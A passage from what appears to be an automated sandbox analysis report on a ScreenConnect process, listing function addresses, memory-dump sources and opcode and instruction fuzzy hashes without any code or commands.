                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B31E9306047018FCB24DF69C84466AB7F1EF9A311B148AADD496DBBA5D730E946CF90
                                                                                                                                                                                                                                                                          Function 00BA36A0 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: f963328b15c26d6cda4fa719613aa451121068cb825c7f5ce310f00a72d0bef9
                                                                                                                                                                                                                                                                          • Instruction ID: 12383eee36265b43cbe6b2782808386b6151fd9f3b49da8c5ebda85a2d19b76c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f963328b15c26d6cda4fa719613aa451121068cb825c7f5ce310f00a72d0bef9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C921F3B5A08251DFCB059FB8995885EBBF1EF4BB1170482A9E416D7366DB30DE00CB50
                                                                                                                                                                                                                                                                          Function 00BADF80 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 985a70282122d5da28641bb62fb30168aeee8f206395264bac53294e508a90bc
                                                                                                                                                                                                                                                                          • Instruction ID: 2b7bcf4c34b6154f20ce2184398513c2067dc271514deee6a8ca0b43a7495191
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 985a70282122d5da28641bb62fb30168aeee8f206395264bac53294e508a90bc
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6221AC706483804FCB229B79D890A5A7FF5EF4735031804EAE166CB366EB689C09CB21
                                                                                                                                                                                                                                                                          Function 00B3D688 Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3272721890.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_b3d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 07d0b5f9289f03e31504d454c44b54c53e81eef061fd156ad2472343225e3977
                                                                                                                                                                                                                                                                          • Instruction ID: 228c6c49109684c3752a52fbf61bca1c124b859a6ffeb8e3bf99ad9cbe9b9e6c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07d0b5f9289f03e31504d454c44b54c53e81eef061fd156ad2472343225e3977
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40213475500200EFCB05DF24E9C4F26BFA5FB98314F30C6A9E9090B256C33AD816DBA2
                                                                                                                                                                                                                                                                          Function 00BA8C20 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: efe2b197e8049a0a5bf4dcee89bf7cfa793eab77bd609d1636deb2c33a5ac0b6
                                                                                                                                                                                                                                                                          • Instruction ID: 613553b556be96f223164995045dc8a34b9ad4467b4aa02cebd2fb66d9606e20
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: efe2b197e8049a0a5bf4dcee89bf7cfa793eab77bd609d1636deb2c33a5ac0b6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 442104716002445FDB04EB28D891BAEBBE2EFC5310F14856AD4059F796EF30AD05CBA2
                                                                                                                                                                                                                                                                          Function 00BAE198 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fac293e6f341cf696a5cc33e0195a74ec03eebd926fac49f85b19e602740c0e9
                                                                                                                                                                                                                                                                          • Instruction ID: 201eecda7a27c1b7966d72c061b6a25dcf4a5231bd282d4df96222c666bfba92
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fac293e6f341cf696a5cc33e0195a74ec03eebd926fac49f85b19e602740c0e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 992192316003098FCB05DF69D8819AEBBF5EF85310B1085B6E519DF315DB34AD05CB91
                                                                                                                                                                                                                                                                          Function 00BA0ECF Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 36e2c514dd34de61e46f6a55a8bd9f39cb9bf70ed25e61ba0053462c98969d88
                                                                                                                                                                                                                                                                          • Instruction ID: 8b31aff42641e04400afb24efe86b218961696853076370a0e1456bffc591f77
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36e2c514dd34de61e46f6a55a8bd9f39cb9bf70ed25e61ba0053462c98969d88
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8113867D2E2C08FC712976898A84917FE0DE63356F0945DFC285CB267E6558903E312
                                                                                                                                                                                                                                                                          Function 00BA86D0 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: b719e5af902b20429e22658217e410b6a5c1b27ead13462888f97a78480c5c7e
                                                                                                                                                                                                                                                                          • Instruction ID: 83785845858c834ac634faa4209bbdc969573523d0fe8415320e9806bc6ee1de
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b719e5af902b20429e22658217e410b6a5c1b27ead13462888f97a78480c5c7e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37211B306047058FC734DF25D844A96BBF5EF85321B248A6DD49297AE1DB31ED4ACF90
                                                                                                                                                                                                                                                                          Function 00BAF2CC Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: c7e7796a934d53ed86f34018c97d099f5f03fa86430a9ed4c9ae39943692f8c1
                                                                                                                                                                                                                                                                          • Instruction ID: 7ba2c4bf78d00343942e8ce2ec7a5f315f1baebeb76d4e5804923290102275dd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7e7796a934d53ed86f34018c97d099f5f03fa86430a9ed4c9ae39943692f8c1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 312137B680024ADFCB10DF9AC844AEEBBF5FF49310F14846AE918A7250C379A555DFA1
                                                                                                                                                                                                                                                                          Function 00BAA7B0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1530dd00e7710b1b2b5d38231a9e709954438acb2782da236b0304b3c0f921be
                                                                                                                                                                                                                                                                          • Instruction ID: 2410acaeda4dc775f4ff220dce94557b988de43df192f3889261499a9036fb1f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1530dd00e7710b1b2b5d38231a9e709954438acb2782da236b0304b3c0f921be
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E214F30A04701CFC724DF29D844A6ABBF5FF49311B108AACD4A6976A4DB34E901CF91
                                                                                                                                                                                                                                                                          Function 00BA8AA0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 78122aee9be27f2291560672e74fb9cf12d2fb42e69a93d976476eb962d02068
                                                                                                                                                                                                                                                                          • Instruction ID: a802ca9a885e21ce535eab72d350b846e12c34bcaa06a16d20a14f08977415bf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 78122aee9be27f2291560672e74fb9cf12d2fb42e69a93d976476eb962d02068
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC11663590424A9FCF41DFA8C9809DEBBF1EF59304B14816AD504FB261D7326E06CB90
                                                                                                                                                                                                                                                                          Function 00BA8C30 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6bfefde1296bdbfc7be3fb48b7220f59ed341c4fd400f76815e97040c126943c
                                                                                                                                                                                                                                                                          • Instruction ID: 6634d7ca2c390fb2037b339e2667d0c4d26f7fd0b7405d0afa5d78985258396f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6bfefde1296bdbfc7be3fb48b7220f59ed341c4fd400f76815e97040c126943c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9411D0717002445BDB08EB68D981B6EB7E6EFC4700F14852EE405AB399DF70AE05C7D2
                                                                                                                                                                                                                                                                          Function 00BAE1A8 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: a5415b0dd4921a4cb071c2e4f8cad2d510ae2e0eb8fea55645ef004eb6143ffb
                                                                                                                                                                                                                                                                          • Instruction ID: a4ff00457fe26e52125db3de57fed9bac5d273d2de0c6dedd986e296fe4a8aff
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a5415b0dd4921a4cb071c2e4f8cad2d510ae2e0eb8fea55645ef004eb6143ffb
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3114231B002099FCB04EFA9D9819AEBBF9EF85350B1085B5E519EB315DB34ED05CB90
                                                                                                                                                                                                                                                                          Function 00BA8B30 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: ef1fd14738510c72564d82272a44e6a6a5114b3517be45455948751f114e8287
                                                                                                                                                                                                                                                                          • Instruction ID: ccf35eb45d856bca194b6f6877d777408001ed58b33ad09ac3c02412a0d0ced2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef1fd14738510c72564d82272a44e6a6a5114b3517be45455948751f114e8287
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F011B471904149DFCB04DFA8D9808DCBBF2FF96311B54C466E005BB625DB32A806CFA0
                                                                                                                                                                                                                                                                          Function 00BA91A8 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 6220445be17b5e40f29d0505d788e88a6e941091c7db32a16e6c419a9fd95e77
                                                                                                                                                                                                                                                                          • Instruction ID: e4a58397bd132c43adc21f835f8b6e528a2635f46b219252bb893d208a0dca99
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6220445be17b5e40f29d0505d788e88a6e941091c7db32a16e6c419a9fd95e77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7511E071E44309BFDB15CA68C840AEABBF6EFC2300F2884A6D404E7255E3729D02DB90
                                                                                                                                                                                                                                                                          Function 00B3D683 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3272721890.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_b3d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                                                          • Instruction ID: 96fbb55a431e30598472b56601ad4e4f432a145dc546f893f7a5e035f01cae01
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6311B176504280DFCB16CF10E5C4B16BFB2FB98314F24C5A9D9490B256C336D85ADBA2
                                                                                                                                                                                                                                                                          Function 00BA4E44 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 3e3eb7c357c7de38c44a15376ce95bb321dd0873080a3d328dd490ec4893c5af
                                                                                                                                                                                                                                                                          • Instruction ID: 3b694c888a5c160a415d76033388835e99ce5fdb70fac84261c335292ba47997
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e3eb7c357c7de38c44a15376ce95bb321dd0873080a3d328dd490ec4893c5af
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F2136B28046499FCB20CF9AC444BDEFBF4EB88320F14846AD519A7200D778A545CFA5
                                                                                                                                                                                                                                                                          Function 00BAFA80 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 01cc1ee957d3a8a96b6c8eba5b38fdf5f0de6008c134921490df65c348372631
                                                                                                                                                                                                                                                                          • Instruction ID: f06a2c320d49ef8b8a0fcad2aebfbd9803895d2ba43a788fb5aa07121cc2cdb0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01cc1ee957d3a8a96b6c8eba5b38fdf5f0de6008c134921490df65c348372631
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF012C7B7400108B8748DA6DF8949AFB7EAEBD9665314847AFA09C7321CE32EC138754
                                                                                                                                                                                                                                                                          Function 00BA91B8 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 411a133126c44ce99d7d8f7efbbffe20f38ede3f1301d6809847aaaa7fa0b528
                                                                                                                                                                                                                                                                          • Instruction ID: 7de51d52eb352290c3eecfb590bf603e7dc1a9f2d0df410b12247309d7f318e2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 411a133126c44ce99d7d8f7efbbffe20f38ede3f1301d6809847aaaa7fa0b528
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F118E71E80305AFDB18CA6DC840AEBB7F6EFC5300F1484A6D414D7254E7729D01DB91
                                                                                                                                                                                                                                                                          Function 00BA8B95 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4a1e6b48aaa4ac751da5e5467ed98395bf1f450da8f52473b2e00304faafe7e5
                                                                                                                                                                                                                                                                          • Instruction ID: a9acd0d45b4356d8d485700fd8218b5e50fc79bb536f4187f3fce82dbdbf0823
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a1e6b48aaa4ac751da5e5467ed98395bf1f450da8f52473b2e00304faafe7e5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5711463190405EDBCB05DFA8D5908ECBFF2EF86314B98C595E005AB129DB36AD46CB60
                                                                                                                                                                                                                                                                          Function 00BACBC0 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 678a9e95d175f8f958abb21394c72e8b1e2f9dc17a6d89757ee86e0b2b9bb5a2
                                                                                                                                                                                                                                                                          • Instruction ID: 59e28339b2f9cea86f71fe88dfa924efce306939ebcf27aa3047d084e9599f6c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 678a9e95d175f8f958abb21394c72e8b1e2f9dc17a6d89757ee86e0b2b9bb5a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE11DA71E4421D8FDF18EBA8D965AEDBBB5EF89310F000469D106BB2B4DA781D45CBA0
                                                                                                                                                                                                                                                                          Function 00BACBB0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7c18cd5fea35c1b551a365ba9b8fca26f862ebe9e9b18cad2e2cbd22c2a59c46
                                                                                                                                                                                                                                                                          • Instruction ID: 8afa628c7780d80df80212f31796e13ebcb096593a856fb53d57da5a52e93fe2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c18cd5fea35c1b551a365ba9b8fca26f862ebe9e9b18cad2e2cbd22c2a59c46
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10110A719442198FDF15EFA8D965AEDBFF1EF4A310F0044A9D002BB3A4EB781845CBA1
                                                                                                                                                                                                                                                                          Function 00BA8AB0 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3273523610.0000000000BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BA0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_ba0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: bcf164e554925d5e22ad587b46c758f2986da6b65c924b62580639bbf4e9b722
                                                                                                                                                                                                                                                                          • Instruction ID: d306a28171bf5086f29ac99d1404ecdad1051a14874d0bbe3d43cc332a35b41c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcf164e554925d5e22ad587b46c758f2986da6b65c924b62580639bbf4e9b722
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0911523590010ADFCF40DFA8D9409DEBBF5FF49304B10856AE504BB261D772AA0ACF90
                                                                                                                                                                                                                                                                          Function 00B3D006 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3272721890.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_b3d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 895f16a1153de5c9979e28ee2b2dc11277d347a7804169030419c8c0916b751f
                                                                                                                                                                                                                                                                          • Instruction ID: 02b3d6c42fe2a0603c0fafe333dd2c98c6de66821a06f1a1976a24381865823e
